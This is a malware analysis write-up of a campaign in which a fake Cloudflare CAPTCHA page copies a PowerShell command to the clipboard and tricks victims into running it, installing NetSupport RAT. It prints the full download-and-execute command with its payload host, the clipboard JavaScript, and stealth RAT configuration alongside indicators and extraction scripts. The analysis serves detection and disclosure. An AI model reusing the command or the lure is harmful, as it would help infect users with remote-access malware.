Modern approach to URL Intelligence - Expose threats, Empower trust

Copy & Paste Malware Dropper — Technical Analysis
By Sourena MAROOFI · 2025-08-24 15:58:35
Overview
This article documents a malware campaign that abuses a fake Cloudflare CAPTCHA page to trick victims into copying and executing a PowerShell command.
The attack ultimately delivers NetSupport Manager (a legitimate remote administration tool often abused as a RAT)
The sample was first recorded on URLAbuse:
{
"id": 493186,
"url": "https://mondossierrenov.com/challenge.html",
"discovery": "2025-08-22 14:40:15",
"added": "2025-08-23 09:03:51",
"target": "#Malware_downloader",
"reporter": "VERIFROM",
"AbuseType": "phishing",
"UUID": "248a4d33325e29fb8602d83298c85153"
}
Behaviour
Stage 1: Fake CAPTCHA
When the user visits the URL, a page imitating a Cloudflare CAPTCHA is shown:

However, this is actually not a cloudflare captcha but just an HTML page simulating the CF CAPTCHA. When the checkbox is clicked, the following JavaScript runs:
checkbox.addEventListener("click", function() {
smartCopy(command);
...
});
The function smartCopy(command) copies a hidden PowerShell command into the clipboard:
const command = `powershell -w h -NoP -c "$u='http://216.245.184.93/bdA.lim';$p=\\"$env:USERPROFILE\\Documents\\m.ps1\\";(New-Object Net.WebClient).DownloadFile($u,$p);powershell -w h -ep bypass -f $p"`;
Stage 2: User Execution Trick
The victim is then shown another fake verification step:

The page instructs the user to:
- Press Windows Key + R (open Run dialog)
- Press CTRL+V (paste the malicious command from clipboard)
- Press Enter
This executes the PowerShell command, which downloads the malware from: http://216[.]245[.]184[.]93/bdA.lim
The payload (9.3 MB) is stored as: C:\Users\<username>\Documents\m.ps1
and executed in hidden mode (-w h) with PowerShell execution policy bypassed (-ep bypass).
- Decoding a Base64-encoded blob into JSON
- Extracting files into a hidden directory: C:\Users\Public\YoaIXhwsHe
- Installing persistence by creating a shortcut in the Windows Startup folder pointing to client32.exe
- Masquerading with a Windows system icon (imageres.dll,102)
- Delayed execution to evade detection
Extracting the Encoded Files
Using bash:
cat bdA.lim | grep -E 'eyJmaWxlcyI6W3sibm.*QUFBQUFBPT0ifV19' -o > extraction.txt
cat extraction.txt | base64 -d -i > decoded_base64.txt
Using jq, we confirm the JSON contains an array of files:
cat decoded_base64.txt | jq '.files[0] | keys'
And here is the small python code to extract the files inside the JSON structure:
import os, base64, json
if __name__ == "__main__":
os.mkdir("payloads")
with open("decoded_base64.txt") as f:
data = json.load(f)
for fobj in data["files"]:
print("decoding.....{}...".format(fobj["name"]))
with open("payloads/{}".format(fobj["name"]), "wb") as fw:
fw.write(base64.b64decode(fobj["b64"]))
print("DONE!")
We are able to extract 12 files:
AudioCapture.dll
client32.exe
client32.ini
HTCTL32.DLL
msvcr100.dll
nskbfltr.inf
NSM.LIC
nsm_vpro.ini
pcicapi.dll
PCICHEK.DLL
PCICL32.DLL
remcmdstub.exe
TCCTL32.DLL
The list of extracted files shows that the malware is a simple NetSupport tool dropper (mostly) known as NetSupport RAT. At this stage, there is no need to analyze the binary files since it's a known and legit tool for remote monitoring.
Let's just take a look at the client.ini file which is the configuration file for NetSupport client.
NetSupport RAT Configuration
The extracted client32.ini reveals how attackers configure NetSupport:
quiet=1
AlwaysOnTop=0
AutoICFConfig=1
DisableChat=1
DisableChatMenu=1
DisableCloseApps=1
HideWhenIdle=1
silent=1
SKMode=1
SysTray=0
GatewayAddress=141.98.11.106:443
Port=443
Here is what this configuration means:
- quiet=1 → Suppresses license warnings
- silent=1 & SKMode=1 → Runs in stealth mode (hidden)
- SysTray=0 → No tray icon visible
- DisableChat* options → Prevent user interaction with attacker
- GatewayAddress=141.98.11.106:443 → Connects to attacker-controlled C2
infrastructure
Malicious Domain
- Domain: mondossierrenov.com
- Registrar: IONOS SE
- Created: 2025-08-18
- Expires: 2026-08-18
- Nameservers:
- ns1107.ui-dns.org
- ns1061.ui-dns.de
- ns1121.ui-dns.biz
- ns1061.ui-dns.com
- A record: 23.227.194.170
- Geo: Chicago, Illinois, US
Command & Control Server
- IP Address: 141.98.11.106
- Hostname: srv-141-98-11-106.serveroffer.net
- Geo: Vilnius, Lithuania
- Reputation: Reported 498 times (as of 24 Aug, 2025) on AbuseIPDB for malicious activities including SSH brute-force and WordPress scanning
Conclusion
This malware campaign uses social engineering (fake CAPTCHA) to trick users into self-executing a clipboard-injected PowerShell payload.
The payload installs NetSupport Manager RAT in stealth mode, connecting back to a known malicious C2 server (141.98.11.106:443).